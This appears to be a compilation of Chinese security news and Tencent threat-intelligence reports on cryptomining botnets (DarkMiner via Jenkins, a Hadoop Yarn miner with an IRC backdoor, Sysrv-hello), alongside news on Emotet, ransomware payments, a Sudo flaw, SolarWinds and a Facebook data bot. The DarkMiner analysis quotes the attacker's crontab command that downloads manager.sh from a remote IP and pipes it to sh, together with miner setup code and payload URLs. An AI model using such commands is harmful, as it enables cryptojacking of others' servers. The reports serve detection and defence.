一、概述 腾讯云防火墙捕获一黑客团伙利用Jenkins未授权访问漏洞针对云服务器的攻击，若攻击者利用漏洞攻击得手，就会通过CURL命令下载shell脚本执行，并继续通过脚本部署挖矿木马。腾讯云防火墙成功拦截了这些攻击，遭遇攻击的主机未受损失。 通过分析腾讯云防火墙拦截到的黑客攻击指令，发现攻击者在部署挖矿程序的过程中，会修改系统最大内存页，以达到系统资源的充分利用，并且会多次检测挖矿进程的状态，从而对挖矿程序进行保活操作。 因其该团伙使用的挖矿账名为syndarksonig@gmail.com，腾讯威胁情报中心将该挖矿木马命名为DarkMiner。根据该挖矿团伙使用的挖矿钱包算力估算，该团伙控制了约3000台服务器挖矿。 腾讯安全专家建议政企用户按照以下步骤自查是否遭遇类似攻击： 检查服务器是否部署Jenkins组件，如有部署，应继续检查是否配置复杂密码。配置弱密码的系统极易被入侵； 检查服务器是否访问矿池：142.44.242.100； 检查服务器是否存在恶意文件：/tmp/ .admin_thread，如有及时kill进程并删除相关文件。 腾讯安全响应清单 腾讯安全系列产品已针对DarkMiner黑产团伙进行升级响应，具体清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）DarkMiner团伙相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）DarkMiner团伙相关信息和情报已支持检索。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生 安全 防护 云防火墙 （Cloud Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，已支持： 1）已支持识别检测DarkMiner团伙关联的IOCs； 2）已支持检测和拦截Jenkins未授权命令执行漏洞利用攻击 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 （Cloud Workload Protection，CWP） 1）已支持查杀DarkMiner团伙相关木马程序； 2）已支持检测Jenkins未授权命令执行漏洞； 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 1）已支持识别检测DarkMiner团伙关联的IOCs； 2）已支持检测Jenkins未授权命令执行漏洞利用攻击； 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta   二、详细分析 Jenkins是一个知名的独立开源软件项目，是基于Java开发的一种持续集成工具，用于监控持续重复的工作，该项目提供了一个开放易用的软件平台，使软件的持续集成变成可能。如果用户在使用jenkins 时未设置帐号密码，或者使用了弱帐号密码，可能导致未授权访问攻击。 如果用户未设置密码，会导致系统存在Jakins存在未授权访问漏洞。 黑客在未授权的情况下访问jenkins系统，并通过系统管理中的“脚本命令行”功能执行了恶意脚本。 腾讯云防火墙捕获到黑客利用Jenkins未授权访问漏洞利用进行攻击的日志。 此次攻击执行恶意命令为： 'sh','-c','crontab -r; echo "* * * * * curl http[:]//37.49.230.155/manager.sh | sh; wget -O- http[:]//37.49.230.155/manager.sh | sh" | crontab -' 接着脚本manager.sh执行挖矿木马下载和启动。 首先根据CPU支持的线程数量设置最大内存页，以达到CPU资源利用最大化： SYSTEM_ADMIN_RENAME=".admin_thread"THREAD_COUNT=$(cat /proc/cpuinfo | grep model | grep name | wc -l) #sysctl -w vm.nr_hugepages=$THREAD_COUNT_MBbash -c "echo vm.nr_hugepages=$(($THREAD_COUNT * 1000)) >> /etc/sysctl.conf"#bash -c "echo vm.nr_hugepages=$THREAD_COUNT >> /etc/sysctl.conf" echo "Threads: $THREAD_COUNT, Threads in MB: $(($THREAD_COUNT * 1000))" sysctl -w vm.nr_hugepages=$(($THREAD_COUNT * 1000)) && echo "SET hugepage $(($THREAD_COUNT * 1000))" #|| \#sysctl -w vm.nr_hugepages=$THREAD_COUNT && echo "SET hugepage $THREAD_COUNT" for i in $(find /sys/devices/system/node/node* -maxdepth 0 -type d); do       echo 3 > "$i/hugepages/hugepages-1048576kB/nr_hugepages"; done echo "1GB pages successfully enabled" 然后通过cat /proc/cpuinfo命令获取CPU类型，并判断是否属于支持的类型。 进入TMP目录下，判断挖矿进程是否已经在运行中。 for path in $TMP_DIR do   >$path/.f && cd $path && rm .f done (ps -x | grep -e "$SYSTEM_ADMIN_RENAME" | grep -v grep) > /dev/null 2>&1 如果没有在运行中，则下载xmrig挖矿木马到/tmp/ .admin_thread，伪装成系统管理进程“System manager”，然后启动挖矿程序。 挖矿使用矿池：142.44.242.100:14444 钱包： 25WSQDugR4bMr9KTsyuiWQawTpaavoxF9pNujecKTpr5MKKUvUyPyL9ZMXq9woLwiVkzcJgkhF39NdENkmEREVLM2ZoqAB 根据该钱包的平均算力40KH/s推算，共有3000台左右服务器被攻陷并植入挖矿木马。 并且该木马会多次检测挖矿进程运行状态，发现失活就重复挖矿程序部署过程，使用多个旷工名连接矿池进行挖矿，其中挖矿子账号名均为syndarksonig@gmail.com。 DarkMiner团伙使用的旷工名 small big xm4868 jenkin jenkin xm14856 mac server xm18614 focal xm959 xm22649 macmac xm1600 xm29274 xmrig worker28467 xm13222 stak xm7381 xmrig29684   IOCs URL http[:]//37.49.230.155/bot.arm5 http[:]//37.49.230.155/system_manager.sh http[:]//37.49.230.155/ssh.sh http[:]//37.49.230.155/manager.sh http[:]//37.49.230.155/xmrig http[:]//37.49.230.155/xmrig1 http[:]//37.49.230.155/xmrig2 http[:]//37.49.230.155/xmrig3 http[:]//37.49.230.155/xmrig4 http[:]//37.49.230.155/xmrig5 MD5 manager.sh f8631ea3001a1ee82b6ba4b96cc6b26f 钱包： 425WSQDugR4bMr9KTsyuiWQawTpaavoxF9pNujecKTpr5MKKUvUyPyL9ZMXq9woLwiVkzcJgkhF39NdENkmEREVLM2ZoqAB

根据区块链分析公司 Chainalysis 上周发布的统计报告，被勒索软件攻击的机构和组织在 2020 年至少支付了 3.5 亿美元的赎金。该数字是通过追踪与勒索软件攻击相关的区块链地址的交易来编制的。尽管 Chainalysis 拥有加密货币相关网络犯罪最完整的数据集之一，但该公司表示实际金额会超过这个预估值。 在报告中指出，2020 年勒索软件支付的赎金占加密货币总交易金额的 7% 左右。Chainalysis 表示，与 2019 年相比，这一数字增长了 311%，并将这一突然增加的原因归咎于一些新的勒索软件从受害者那里获取了大量的资金，以及一些已经存在的勒索软件提高了赎金金额。   在勒索黑客组织中，报告指出有Ryuk、Maze(现已解散)、Doppelpaymer、Netwalker(被当局破坏)、Conti 和 REvil(又名Sodinokibi) 等集团。尽管如此，诸如 Snatch、Defray777(RansomExx)和 Dharma，去年也获得了价值数百万美元的赎金。 Chainalysis 表示，它还追踪了犯罪分子如何通过区块链转移赎金。他们的发现与往年没有太大区别，他们指出，犯罪分子通常通过比特币混合服务进行洗钱，然后将资金送到合法和高风险的加密货币交易门户，将资金兑换成现实世界的货币。 但 Chainalysis 团队也证实了Advance Intelligence 上个月发布的一份报告，该报告发现，勒索软件团伙经常使用这些资金来支付其他网络犯罪服务。 Chainalysis表示，它也看到了向防弹托管提供商、漏洞销售商和渗透测试服务（也称为初始访问经纪人）支付的款项，因为勒索软件行动与他们的 “供应商 “打交道。           （消息及封面来源：cnBeta）

一、概述 腾讯安全威胁情报中心检测到有攻击者利用Hadoop Yarn REST API未授权命令执行漏洞攻击云上主机，攻击成功后执行恶意命令，向系统植入挖矿木马、IRC BotNet后门、DDoS攻击木马，入侵成功后还会使用SSH爆破的方式进一步向目标网络横向扩散。 攻击者入侵成功后，会清理系统进程和文件，以清除其他资源占用较高的进程（可能是可疑挖矿木马，也可能是正常服务），以便最大化利用系统资源。入侵者同时会配置免密登录后门，以方便进行远程控制，入侵者安装的IRC后门、DDoS木马具备完整的目标扫描、下载恶意软件、执行任意命令和对特定目标进行网络攻击的能力。 通过对木马家族进行关联分析，发现本次攻击活动与永恒之蓝下载器木马关联度极高，攻击者使用的攻击套件与Outlaw僵尸网络木马高度一致，但尚不能肯定攻击活动由这两个团伙发起。 因本次攻击具有蠕虫式的扩散传播能力，可下载安装后门、执行任意命令，发起DDoS攻击，对受害单位网络信息系统安全构成严重影响。腾讯安全专家建议用户尽快修复Hadoop Yarn REST API未授权命令执行漏洞，避免采用弱口令，采用腾讯安全的技术方案检测系统，清除威胁。 Hadoop是一个由Apache基金会所开发的分布式系统基础架构，YARN是hadoop系统上的资源统一管理平台，其主要作用是实现集群资源的统一管理和调度，可以把MapReduce计算框架作为一个应用程序运行在YARN系统之上，通过YARN来管理资源。 YARN提供有默认开放在8088和8090的REST API（默认前者）允许用户直接通过API进行相关的应用创建、任务提交执行等操作。在配置不当的情况下，REST API将会开放在公网，从而导致未授权访问的风险，黑客可利用该风险进行远程命令执行，实现对目标主机的完全控制。 自查处置建议 腾讯安全专家建议受影响的用户检查以下项目，清除木马，加固系统。 目录： /tmp/.W10-unix/.rsync/ 计划任务项: 11*/2** /a/upd>/dev/null 2>&1 58**0 /b/sync>/dev/null 2>&1 @reboot /b/sync>/dev/null 2>&1 00*/3** /c/aptitude>/dev/null 2>&1 加固： 1.如果Hadoop环境仅对内网提供服务，请不要将其服务开放到外网可访问。 2.如果必须开启公网访问，Hadoop在2.X以上版本提供了安全认证功能，建议管理员升级并启用Kerberos的认证功能，阻止未经授权的访问。 腾讯安全响应清单 腾讯安全全系列产品，可以在该团伙攻击的各个环节实施检测、防御。 腾讯安全产品应对本次威胁的详细响应清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）威胁情报已加入，可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）该Miner挖矿团伙相关情报已支持检索，可自动关联分析到该病毒家族最新变种，使用资产。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全防护 云防火墙 （Cloud  Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，阻断恶意攻击流量，阻断恶意通信流量： 1）Miner相关联的IOCs已支持识别检测； 2）Miner利用Hadoop Yarn REST API未授权漏洞发起的恶意攻击以支持识别检测，阻断； 3）支持检测SSH爆破攻击活动。 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec   主机安全 （Cloud  Workload Protection，CWP） 1）已支持Miner关联模块的检测告警、查杀清理； 2）支持检测SSH爆破攻击活动。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）Miner相关联的IOCs已支持识别检测； 2）Miner利用Hadoop Yarn REST API未授权漏洞发起的恶意攻击以支持识别检测； 3）支持对SSH爆破攻击活动进行检测。 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 （iOA） 1）已支持Miner关联模块的检测告警、查杀清理。 零信任无边界访问控制系统（iOA）是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念，推出的网络边界访问管控整体解决方案。更多资料，可参考：https://s.tencent.com/product/ioa/index.html 二、详细分析 攻击者使用Hadoop命令执行入侵成功后执行恶意的经过BASE64编码的shell脚本，解码后可知，其目的是使用sftp从sshapi.netcatkit.com内下载dota3.tar.gz包，将其解压后执行目录内的initall文件和golan文件。 /tmp/.W10-unix/.rsync/initall /tmp/.W10-unix/.rsync/c/golan initall执行后则进一步对系统进程，文件进行清理，最终调用执行init2。 Intit2执行后则执行解压包内的多个文件，分别存放在a,b,c三个子文件夹。a目录下文件多层调用后执行挖矿程序；b目录多层调用后传播IRC BotNet后门木马，同时修改系统免密登录配置留下后门；c目录文件主要运行masscan做端口扫描，运行stsm（sshprank）进行暴力破解。 同时将3个目录下的主调度文件写入crontab启动项。 /.rsync/a/init0 主要功能为从文件、进程、网络对其它资源占用较高的程序进行清理，最终调用脚本执行wanwakuang的矿机文件。 /.rsync/a/a x86_64架构下执行挖矿wanwakuang，i686架构下执行anacron，但anacron模块并不存在，推测当前其挖矿平台覆盖度并不完善。 wanwakuang则为xmr矿机程序，进行门罗币挖矿。 /.rsync/b/a 进一步执行/.rsync/b/run程序。 /.rsync/b/run 该脚本主要包含两部分BASE64编码过的恶意命令，第一部分解码后为使用Perl编写的IRC BotNet木马，第二部分解码后主要为结束其它资源占用进程的shell命令，该文件同时会篡改authorized_keys文件进行免密登录后门配置。 解码后Perl编写的IRC BotNet 木马，该木马会对C2地址：api.netcatkit.com:443建立IRC连接，本地NICK，USER随机生成，管理员NICK为polly，molly。IRC连接成功后默认加入#007频道，木马具备基本的远程shell命令执行，文件下载，ddos网络攻击等功能。 指定目标进行Shell命令执行。 指定目标端口扫描，指定下载。 指定目标进行TCP，UDP，IGMP，ICMP类型流量攻击。 /.rsync/c/golan 调用masscan端口扫描工具和stsm暴力破解工具，对局域网内的开放的SSH服务进行暴破攻击，扫描时会首先获取本地SSH历史登录配置信息，通过直接攻击本地登录过的机器以提高其爆破成功率。 分析可知，该挖矿攻击代码结构，调度流程与Outlaw僵尸网络高度一致，下左图为本次捕获到的挖矿套件，右为Outlaw僵尸网络攻击套件。两者有着基本一致的包名，子模块名，脚本调度流程。不同之处为两者挖矿模块名字不同，挖矿模块存储方式分别为本地包内存储化和动态C2下载形式，同时两者使用到的扫描器有些许差异。 从其攻击方式和基础设施来看，更像是永恒之蓝家族投递，样本payload都使用netcatkit.com，sqlnetcat.com下的子域名进行托管，同时最终的包名，挖矿模块名有一致性。 下图为最近捕获的永恒之蓝下载器木马使用Hadoop Yarn REST API未授权命令执行攻击入侵，其payload托管地址为t.netcatkit.com/ln.core。 永恒之蓝payload其内当前注释掉的代码部分，下载链接包解压后执行initall：down.sqlnetcat.com/dota3.tar.gz（当前下载链接失效），dota3.tar.gz同样解压出名为的.rsync攻击套件。         IOCs MD5: 6eb76f7d81e899b29c03b8ee62d9acb3 be85068596881f3ebd6c0c76288c9415 10ea65f54f719bffcc0ae2cde450cb7a 4adb78770e06f8b257f77f555bf28065 eefc0ce93d254982fbbcd26460f3d10d be5771254df14479ad822ac0a150807a e46e8c74e2ae7d9bc2f286793fe2b6e2 c2531e3ee3b3ca43262ab638f9daa101 f093aae452fb4d8b72fe9db5f3ad559a c97485d5ba33291ed09b63286a7d124c 3570a54d6dace426e9e8520f302fe551 Domain： sshapi.sqlnetcat.com sshapi.netcatkit.com sshapi.ouler.cc api.netcatkit.com www.minpop.com t.netcatkit.com down.sqlnetcat.com URL： hxxp://www.minpop.com/sk12pack/names.php hxxp://www.minpop.com/sk12pack/idents.php  

全球最危险的恶意软件僵尸网络在全球执法部门共同合作，历经两年的不懈打击下终于被取缔。在欧洲刑警组织、美国联邦调查局、英国国家犯罪局和其他机构的联合行动中，终于控制和取缔了 Emotet 僵尸网络的基础设施。 Emotet 在 2014 年首次以银行木马的形式出现，但随后演变成为网络犯罪分子最强大的恶意软件之一。Emotet 通过自动钓鱼邮件建立一个后门进入 Windows 电脑系统，分发被恶意软件入侵的 Word 文档。Emotet 活动中的电子邮件和文件的主题会被定期更改，以提供最好的机会引诱受害者打开电子邮件并安装恶意软件–常规主题包括发票、发货通知和有关 COVID-19 的信息。 然后，操纵 Emotet 背面的人将这些受感染的设备出租给其他网络犯罪分子，作为额外恶意软件攻击的通道，包括远程访问工具（RAT）和勒索软件。这导致 Emotet 成为欧洲刑警组织所描述的 “世界上最危险的恶意软件 “和 “过去十年中最重要的僵尸网络之一”，像 Ryuk 勒索软件和 TrickBot 银行木马这样的行动雇用访问被 Emotet 入侵的机器，以便安装自己的恶意软件。 因此对 Emotet 的取缔是近年来对恶意软件和网络犯罪分子重要的一次打击活动。欧洲刑警组织欧洲网络犯罪中心（EC3）行动负责人费尔南多·鲁伊斯（Fernando Ruiz）表示：“这可能是我们最近影响最大的行动之一，我们预计它将产生重要的影响。我们对行动结果非常满意”。 世界各地的执法机构经过一周的行动，获得了 Emotet 在全球数百台服务器的基础设施的控制权，并从内部破坏了它。被Emotet感染的机器现在被引导到执法机构控制的基础设施上，这意味着网络犯罪分子无法再利用被入侵的机器，恶意软件也无法再传播到新的目标，这将对网络犯罪行动造成极大的干扰。 Ruiz 表示：“Emotet在很长一段时间内都是我们的头号威胁，拿下它将产生重要影响。Emotet参与了30%的恶意软件攻击；成功拿下将对犯罪环境产生重要影响。我们预计它会产生影响，因为我们正在移除市场上的主要投放者之一–肯定会有一个缺口，其他犯罪分子会试图填补，但在一段时间内，这将对网络安全产生积极影响”。 对Emotet的调查还发现了一个被盗电子邮件地址、用户名和密码的数据库。人们可以通过访问荷兰国家警察网站来检查他们的电子邮件地址是否被Emotet泄露。欧洲刑警组织还与世界各地的计算机应急小组（CERT）合作，帮助那些已知感染Emotet的人。         （消息来源：cnBeta；封面源自网络）

安全研究人员近日披露了存在于 Sudo 中的漏洞细节。该漏洞可能会被攻击者利用，从而在众多基于 Linux 的发行版本中获得最高的 root 权限。根据 Qualys 分享的细节，这个安全漏洞被描述为“可能是有史以来最重要的 Sudo 漏洞”。更令人担忧的是，这个堆的缓冲区溢出漏洞已经存在将近 10 年时间了。 这个漏洞称之为 Baron Samedit，追踪编号为 CVE-2021-3156，几乎所有版本的 Sudo 都存在影响。据悉，受影响的 Sudo 漏洞版本包括从 1.8.2 到 1.8.32p2 的经典版本，以及从 1.9.0 到 1.9.5p1 所有稳定版本。Qualys在写到其发现时说，该漏洞“可被任何本地用户利用”，不需要认证的情况下获得最高权限。 该公司还表示：“我们基于这个漏洞延伸出了三个漏洞，并在 Ubuntu 20.04(Sudo 1.8.31)、Debian 10(Sudo 1.8.27)和 Fedora 33(Sudo 1.9.2)上获得了完全的 root 权限。其他操作系统和发行版可能也是可以利用的。” Baron Samedit尚未在国家漏洞数据库中获得严重性评级，但考虑到Sudo的普遍性以及该漏洞容易被利用，一旦分析完成，它很可能是一个高危评级。各个Linux发行版的补丁已经开始出现，如果你使用的是Ubuntu，可以在这里获得更新，而红帽的更新可以在这里找到。         （消息及封面来源：cnBeta）

根据Motherboard的报道，有人掌握了一个包含大量Facebook用户手机号码的数据库，现在正利用Telegram机器人出售这些数据。发现这个漏洞的安全研究人员Alon Gal表示，运行这个机器人的人声称掌握了5.33亿用户的信息，这些信息来自于Facebook的一个漏洞，该漏洞在2019年被修复。 对于很多数据库来说，要找到任何有用的数据都需要一定的技术能力。而且拥有数据库的人和想要从数据库中获取信息的人之间往往要有互动，因为数据库的 “主人 “不会随便把那些有价值的数据交给别人。然而，制作一个Telegram机器人，就解决了这两个问题。 这个机器人可以让别人做两件事：如果他们有一个人的Facebook用户ID，就可以找到这个人的手机号码；如果他们有一个人的手机号码，就可以找到他们的Facebook用户ID。当然，虽然真正获得人们要找的信息是要花钱的–解锁一个信息，比如手机号码或Facebook ID，需要一个信用点，机器人背后的人以20美元的价格出售。根据Motherboard的报告，还有批量定价，1万个信用点的售价为5000美元。 根据Gal发布的截图，这个机器人至少从2021年1月12日开始运行，但它提供的数据是2019年的。尽管数据是以前的，但人们不会那么频繁地更换手机号码。这对Facebook来说尤其尴尬，因为它历史上收集了包括开启双因素认证的用户在内的人的手机号码。 目前不知道Motherboard或安全研究人员是否已经就此事联系了Telegram。         （消息及封面来源：cnBeta）  

2021 年 1 月 20 日，微软发布了针对 SolarWinds 入侵事件的又一份深度调查报告，并且指出幕后攻击者有着极其高超的黑客技巧和娴熟度。在去年的攻击中，SolarWinds 因 Orion IT 管理软件的封包服务器被恶意软件感染，导致包括微软在内的数以万计的客户，在部署更新后受到了不同程度的影响。 在这篇报告中，微软主要深入探讨了攻击者是如何逃避检测、并通过企业内网进行静默传播的。 “首先，在每台机器上的 Cobalt Strike 动态链接库（DLL）植入都是唯一的，以避免恶意软件自身被筛查到任何重复的痕迹。 其次，攻击者重用了文件、文件夹、导出功能的名称，辅以 C2 域名 / IP、HTTP 请求、时间戳、文件元数据、配置、以及运行子进程。” 如此极端的差异化，同样出现在了不可执行的部分，比如 WMI 过滤查询和持久性过滤器的名称、用于 7-zip 压缩包的文档密码、以及输出日志文件的名称。 想要对每台受感染的计算机执行如此细致筛查，显然是一项让人难以置信的艰苦工作。但攻击者就是通过这样的手段，在很长一段时间内躲过了安全防护系统的检测。 此外攻击者不仅勤奋，还显得相当具有耐心。比如为了避免被检测到，它还会首先枚举目标计算机上运行的远程进程和服务。 接着通过编辑目标计算机的注册表，以禁用特定安全服务进程的自动启动。在切实的攻击发起之前，恶意软件会非常耐心地等待计算机重新启动。 最后，微软指出了 Solorigate 攻击者的其它聪明之处，比如仅在工作时间段内对系统发起攻击，因为此时发生的正常活动会掩盖他们的真实目的。 结合复杂的攻击链和旷日持久的操作，安全防护系统也必须在持续数月的时间里、对攻击者的跨域活动有着全面的了解，辅以历史数据和强大的分析工具，才能尽早地对异常状况展开调查。           （消息来源：cnBeta；封面源自网络）

一、概述 腾讯安全威胁情报中心检测到Sysrv-hello僵尸网络对云上Nexus Repository Manager 3存在默认帐号密码的服务器进行攻击。得手后再下载门罗币矿机程序挖矿，同时下载mysql、Tomcat弱口令爆破工具，Weblogic远程代码执行漏洞（CVE-2020-14882）攻击工具进行横向扩散。其攻击目标同时覆盖Linux和Windows操作系统。 Sysrv-hello僵尸网络挖矿前，恶意脚本还会尝试结束占用系统资源较多的进程，以独占系统资源，这一行为可能造成企业正常业务中断。CVE-2020-14882漏洞由Oracle 2020年10月21日发布公告修复，属于较新的漏洞攻击工具，因部分企业漏洞修复进度较慢，使得该团伙的攻击成功率较高。 该僵尸网络于2020年12月首次被国内安全研究人员发现，由于具备木马、后门、蠕虫等多种恶意软件的综合攻击能力，使用的漏洞攻击工具也较新，仅仅用了一个多月时间，该僵尸网络已具有一定规模，对政企机构危害较大。   自查处置建议 腾讯安全专家建议政企用户尽快修复weblogic远程代码执行漏洞（CVE-2020-14882），修复Nexus Repository Manager 3、mysql、Tomcat服务器存在的弱口令风险，对系统以下条目进行排查： 文件： Linux: /tmp/network01 /tmp/sysrv /tmp/flag.txt   Windows: %USERPROFILE%\appdata\loacal\tmp\network01.exe %USERPROFILE%\appdata\loacal\tmp\sysrv.exe   进程： network01 sysrv   定时任务： 排查下拉执行(hxxp://185.239.242.71/ldr.sh)的crontab项   腾讯安全响应清单 腾讯安全全系列产品支持在各个环节检测、防御Sysrv-hello僵尸网络对云上主机的攻击。   具体响应清单如下： 应用 场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 （SaaS） 1）威胁情报已加入，可赋能全网安全设备。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1）Sysrv-hello相关情报已支持检索，可自动关联分析到该病毒家族最新变种，使用资产。 网管可通过威胁追溯系统，分析日志，进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息，可参考：https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 （Cloud  Firewall，CFW） 基于网络流量进行威胁检测与主动拦截，阻断恶意攻击流量，阻断恶意通信流量： 1）Sysrv-hello相关联的IOCs已支持识别检测； 2）支持检测和拦截Sysrv-hello发起的Nexus 恶意攻击、weblogic（CVE_2020_14882）恶意攻击； 3）支持检测mysql爆破攻击。 有关云防火墙的更多信息，可参考：  https://cloud.tencent.com/product/cfw 腾讯T-Sec   主机安全 （Cloud  Workload Protection，CWP） 1）云镜已支持Sysrv-hello关联模块的检测告警，查杀清理。 腾讯主机安全（云镜）提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。 关于T-Sec主机安全的更多信息，可参考：https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全（云镜）、腾讯御知等产品数据导入，为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息，可参考：https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 （腾讯御界） 基于网络流量进行威胁检测，已支持： 1）支持识别、检测Sysrv-hello相关联的IOCs； 2）支持检测和拦截Sysrv-hello发起的Nexus 恶意攻击、weblogic（CVE_2020_14882）恶意攻击； 3）支持检测mysql爆破攻击。 关于T-Sec高级威胁检测系统的更多信息，可参考： https://cloud.tencent.com/product/nta 腾讯T-Sec 零信任无边界 访问控制系统 （iOA） 1）已支持Sysrv-hello关联模块的检测告警和查杀清理。 零信任无边界访问控制系统（iOA）是腾讯结合自身丰富的网络安全管理实践经验与“零信任”理念，推出的网络边界访问管控整体解决方案。更多资料，可参考：https://s.tencent.com/product/ioa/index.html   二、详细分析 腾讯云防火墙检测到Sysrv_hello僵尸网络针对使用Nexus Repository Manager 3默认账户密码资产发起攻击，下图为攻击过程中产生的恶意payload。 恶意payload执行后Nexus将添加名为t的task脚本执行任务，该任务触发执行后（“action”:”coreui_Task”,”method”:”run”…）进一步下拉恶意脚本执行，恶意脚本地址（hxxp://185.239.242.71/ldr.sh） ldr.sh恶意脚本首先会尝试卸载云主机安全软件（aliyun，yunjing），停止部分服务(安全软件，挖矿木马)，同时删除部分docker挖矿镜像。 清理高CPU占用进程达到资源独占目的(对CPU占用达到50%的进程进行清理) 尝试下载矿机命令执行，进程名为network01，矿池，钱包地址如下： Pool.minexmr.com 49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa xmr.f2pool.com 49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa 下载sysrv蠕虫扩散模块、下载挖矿守护进程功能模块执行 最后将其自身写入计划任务，并删除本地相关对应文件 该木马不仅攻击Linux系统，同时发现针对Windows平台的恶意载荷，攻击Windows系统成功后会植入powershell恶意脚本，脚本会进一步拉取Windows平台的相同模块到tmp目录执行。 Linux系统下sysrv模块通过使用52013端口作为互斥量，端口开启状态判定为已感染环境直接退出，否则打开本地该端口进行占用。 sysrv通过检测进程，判断network01进程（矿机进程）是否正常运行，如果未正常运行，就在tmp目录进一步释放出文件内嵌的elf文件，并命名为network01将其执行。 network01模块为门罗币矿机程序，该团伙通过清理可能的竞品挖矿进程或其他占CPU资料较多的进程实现独占CPU资源挖矿。 sysrv确认挖矿行为正常运行后，会开始进行蠕虫式的攻击传播：进行随机IP的端口扫描与漏洞利用，会尝试对mysql，Tomcat服务进行爆破攻击，尝试对Weblogic服务使用CVE-2020-14882漏洞（该漏洞公告由Oracle官方于2020年10月21日公开）进行远程代码执行攻击，这一横向扩散行为使该团伙控制的肉鸡规模迅速增大。 hello_src_exp爆破，漏洞利用组合攻击 攻击mysql服务使用的弱口令爆破字典 攻击Tomcat服务使用的爆破口令 对Weblogic组件利用CVE-2020-14882 远程代码执行漏洞攻击，该安全漏洞为2020年10月Oracle官方公告修复，属于相对比较新的漏洞攻击武器。 IOCs MD5: 33c78ab9167e0156ff1a01436ae39ca1 6db4f74c02570917e087c06ce32a99f5 750644690e51db9f695b542b463164b9 d708a5394e9448ab38201264df423c0a bc2530a3b8dc90aca460a737a28cf54b 236d7925cfafc1f643babdb8e48966bf URL: hxxp://185.239.242.71/ldr.sh hxxp://185.239.242.71/ldr.ps1 hxxp://185.239.242.71/xmr64 hxxp://185.239.242.71/xmr32 hxxp://185.239.242.71/xmr32.exe hxxp://185.239.242.71/xmr64.exe hxxp://185.239.242.71/sysrv hxxp://185.239.242.71/sysrv.exe IP: 185.239.242.71(ZoomEye搜索结果) 矿池&钱包 pool.minexmr.com xmr.f2pool.com 49dnvYkWkZNPrDj3KF8fR1BHLBfiVArU6Hu61N9gtrZWgbRptntwht5JUrXX1ZeofwPwC6fXNxPZfGjNEChXttwWE3WGURa

